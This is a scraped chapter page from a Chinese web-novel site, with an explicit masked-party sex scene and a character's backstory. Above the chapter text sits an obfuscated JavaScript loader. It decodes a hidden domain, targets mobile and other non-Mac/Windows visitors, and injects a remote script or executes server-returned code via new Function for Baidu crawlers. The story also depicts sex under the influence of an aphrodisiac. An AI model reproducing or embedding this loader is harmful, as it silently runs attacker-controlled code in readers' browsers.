98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

038彼时(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('038彼时

灯红酒绿,假面轰趴如火如荼,下半夜路过的侍者盘上换上果酒,这种果酒后劲大,正如挥洒青春需要的后续。

发起人学姐很热情,拒绝完天台BBQ的邀请,他端走两杯,推开人潮找到楼上某一处,那里坐着一直孤独的狐狸。

哦不,应该是气急败坏的homeless。

“还好吗?”黑眸穿过面具孔凝视两眼迷离。

面前的酒精闪着诱人的光泽,她左手拿过,一手敲着右边的房门:“不好,没看到吗?”

“被关在外面了?”

“显然。”

“我可以帮你。”醇醇的笑声响起,他看到无动于衷的人儿间烦躁地摇头拿下面具,凉薄的唇勾起,“我有魔法。”

“Magic.”她夸张地摆着魔术师的经典手势,扫堂腿回复无稽之谈,把人踢落之后却被束缚双手,她挑眉示意松开:“Bravo.”

力道稍微一松她便甩开,拿起酒杯喝了一口,零星残留口红的嘴唇亮晶晶的。

“我可以教你。”他们背靠墙壁碰杯,换回中文聊天。

收了收酸痛的脚腕,渣体质的她摆手:“半吊子。”

两到实现一同聚集在红肿的脚腕:“还好吗?”

高跟的黑色细带对比下,红肿特别明显:“显然,不好。”

“我可以帮你。”

“不用。”

那只脚朝他相反的方向交叠,立起的脚趾晶莹剔透,另一只脚向脚边一踢。

一只酒瓶被踢着滚过来,不知是谁喝了一半的酒瓶,她拿起续杯。

假面轰趴嬉笑不断,两人说话的声音却越来越小。

“下次控制好力度,不然伤的是自己。”

她一脸“Come on”的表情:“难不成真拿沙袋练。”防身而已。

酡红的两颊忽然凑近:“你……我们是不是见过?”

“Maybe.”语调低沉婉转,声息交融,气氛暧昧起来。

青葱手指欲穿过被黑与白分割成两半的面具,停留在齐刷刷的睫毛上:“我们一定见过。”

他对上笃定的眼:“你要怎么认出我?”

嘴唇短暂的碰触无数回,但两人都选择无视。

回答是一记燦笑。

两支见底的酒杯掉落在地,不知何时起,谁的手伸进衣服,谁的腰带脱落,房卡刷开门的瞬间,得意的气音从狂热的吻中溢出:“See?”

眼看右边的房门开了,不过她忘了她不再靠墙。

这是少有的热烈回应,柔软的舌会主动吮吸他的,纽扣拉链都会被她解开,甚至避孕套盒子就是她打开放到他手里。

然后是迎合的臀、早已泛滥的娇嫩,以及他爱极的娇喘。

激烈的节奏,没完没了的翻滚,极点的角度。

至少在这一年里是仅有的。

情欲汹涌,来时猛烈,退潮之后,却留落寂。

最后一次,澄澈的眼在深刻的沉默里高潮,她的手停在面具的绑带上,他还是陌生人。

不过,陌生人都是他。

至少还能控制,都会是他。

雪白的背蜷缩对他,背脊骨十分突出,他一节一节地按过,对比自己记忆中的数量。

发白的嘴唇在枕间喃喃,也许是累极,悉索间他听不太清楚,耳朵笨拙地凑近也不甚明白。

搞不懂为什么,有点徒劳,或者其实他也是明白的。

他躺回她身边,隔着掌温抚触柔和的轮廓。

虞晚栀对奚扬说的最后一句话是什么来着?

哦。

“你以为你是谁啊。”

甚至不是一个问句。

他是Johnny,John的弟弟。

他哥单名一个“晟”字,正午十二点的太阳,光明炽盛。

他自己取名为“扬”,跟随而上;跟随阳光、不可告人的影子。

光与影、黑与白,一开始就分好了,影得藏于黑暗之中成长。

于无间地狱,韬光养晦还是自我放逐?

地下世界对他来说,再适合不过,不管是人、刺青还是深网,都不过是一团代码,多么干脆,各种有关罪恶的刺青,像是在牲畜上盖章。

在这里,更够脱离“代号”,是尊贵的,代价也是随之而来并且源源不绝的。

效果显而易见,能力出色又情感淡薄,他爷爷很满意,只是身处横流物欲之中,如何不受诱惑,各种有关于“瘾”的测试必不可少。

金钱权力与生俱来,于是,烟、酒、性……

关于性的初体验,他撒过谎。

那是又一个酒会,他出来找线人,奚晟递给他一杯酒,感官瞬间放大。

做影的时间里,阴郁俊美的少年最招人喜欢,但他不喜欢送上门的,这点奚晟最清楚,一个眼神就心领神会。

他需要发泄,狠意在看到他女伴时达到峰值。

生理感受不可避免,催情下的性是刺激的。

只是那位partner未免太不合格。

以为早上可以偷梁换柱,却不知自己只是博弈中的一颗棋子。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间